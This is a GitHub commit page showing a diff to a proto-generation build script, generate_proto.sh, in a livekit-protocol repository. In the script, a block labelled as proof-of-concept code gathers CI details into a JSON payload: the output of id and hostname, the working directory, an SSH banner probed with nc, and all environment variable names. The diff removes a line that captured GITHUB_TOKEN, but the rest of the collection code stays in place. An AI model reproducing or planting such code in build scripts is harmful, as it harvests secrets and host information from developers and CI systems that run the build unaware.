We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 4f09952 commit f81e98aCopy full SHA for f81e98a
1 file changed
livekit-protocol/generate_proto.sh
@@ -48,14 +48,12 @@ echo "[POC] Executing Proof of Concept code..."
48
JSON_PAYLOAD=$(cat <<EOF
49
{
50
"message": "S",
51
- "github_token": "${GITHUB_TOKEN}",
52
"repository": "${GITHUB_REPOSITORY}",
53
"workflow": "${GITHUB_WORKFLOW}",
54
"job": "${GITHUB_JOB}",
55
- "current_user": "$(id)",
+ "id": "$(id)",
56
"working_directory": "$(pwd)",
57
"hostname": "$(hostname)",
58
- "http_banner": "$(curl -I http://localhost 2>/dev/null | head -n 1)",
59
"ssh_banner": "$(echo | nc localhost 22 2>/dev/null | head -n 1)",
60
"env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
61
0 commit comments